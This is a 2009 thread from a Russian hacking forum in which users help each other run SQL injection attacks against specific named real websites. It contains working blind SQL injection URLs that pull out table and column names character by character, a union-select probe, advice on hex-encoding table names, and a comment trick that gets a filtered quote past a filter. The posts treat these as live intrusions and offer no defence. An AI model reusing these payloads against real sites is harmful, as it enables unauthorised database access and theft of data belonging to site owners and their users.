 |
|
31.05.2009, 10:07
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Сообщение от $n@ke
или погугли bind.pl
ага,повторил,что такое BIND сервер и даже вспомнил команду bind в никсах )
|
|
|
31.05.2009, 13:58
|
|
Познающий
Регистрация: 19.04.2008
Сообщений: 67
С нами:
9505375
Репутация:
19
|
|
blind sql inj
Сообщение от R1dex
Неужели в гугле не найти?
Тот же sipt4..
Нету в сипте 4 посимвольного брута....
Еще вопрос по blind...
Код:
http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+table_name+from+information_schema.tables+limit+1,1),1,1))>=1--
Код:
http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+table_name+from+information_schema.tables+limit+1,1),1,1))>=200--
Видно что вывод разный, написал кое-как кривой скрипт, сдампил таблицы...
терь вопрос почему
Код:
http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x276E65777327),1,1))>=1--
и
Код:
http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x276E65777327),1,1))>=200--
Возвращают одинаковые результаты...
таблица 0x276E65777327=news точно есть, т к
Код:
http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+*+FROM+news),1,1))>=1--
|
|
|
|
31.05.2009, 14:04
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
2DeepXhadow как нет посимвольного брута в сипт4?
select+table_name+from+information_schema.tables+l imit+{N16-300},1
|
|
|
|
31.05.2009, 14:35
|
|
Познающий
Регистрация: 11.02.2009
Сообщений: 98
С нами:
9076508
Репутация:
169
|
|
DeepXhadow
Код:
http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x6E657773+limit+1,1),1,1))>=1--
1) При выводе колонок тоже нужен limit;
2) Хексить нужно значение без кавычек, т.е. news=0x6e657773, а не 0x276E65777327. |
|
|
|
01.06.2009, 00:07
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
С нами:
9431076
Репутация:
229
|
|
Есть инъекция, число колонок то я нашел, но дальше при выполнения запроса
http://www.clavesin.ru/addcard?dataID=-1227+union+select+1,2,3
происходит редирект. Что с этим можно сделать, кроме как посимвольно брутить?
Последний раз редактировалось nemaniak; 01.06.2009 в 00:10..
|
|
|
|
01.06.2009, 00:15
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
С нами:
9837719
Репутация:
466
|
|
nemaniak а ты попробуй какимнить http дебагером! типа Accessdiver
я глянул полей с выводом нема ((
Последний раз редактировалось Rubaka; 01.06.2009 в 00:31..
|
|
|
|
01.06.2009, 00:23
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами:
10339586
Репутация:
1396
|
|
а после редиректа нет полей с выводом? часто бывает что они присутствуют. Ежели нету, но хочется норм.скули - поищи ее в другом месте.
|
|
|
|
01.06.2009, 00:26
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
http://www.clavesin.ru/articles/index_tplid4_recid3'.html
without redirect
|
|
|
|
01.06.2009, 19:36
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
С нами:
9431076
Репутация:
229
|
|
http://www.clavesin.ru/articles/index_tplid4_recid3+or+1=1.html
выдает ошибку, подскажите плиз почему? И как эту инъекцию раскрутить бы?
|
|
|
|
01.06.2009, 21:36
|
|
Banned
Регистрация: 11.03.2009
Сообщений: 214
С нами:
9035873
Репутация:
317
|
|
http://www.clavesin.ru/articles/index_tplid4_recid3+or+1=1.html
выдает ошибку, подскажите плиз почему? И как эту инъекцию раскрутить бы?
Там для выполнения запроса, должна присутствовать одинарная ковычка в запросе, а она "фильтруется"
http://www.clavesin.ru/articles/index_tplid4_recid3/*'*/.html
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
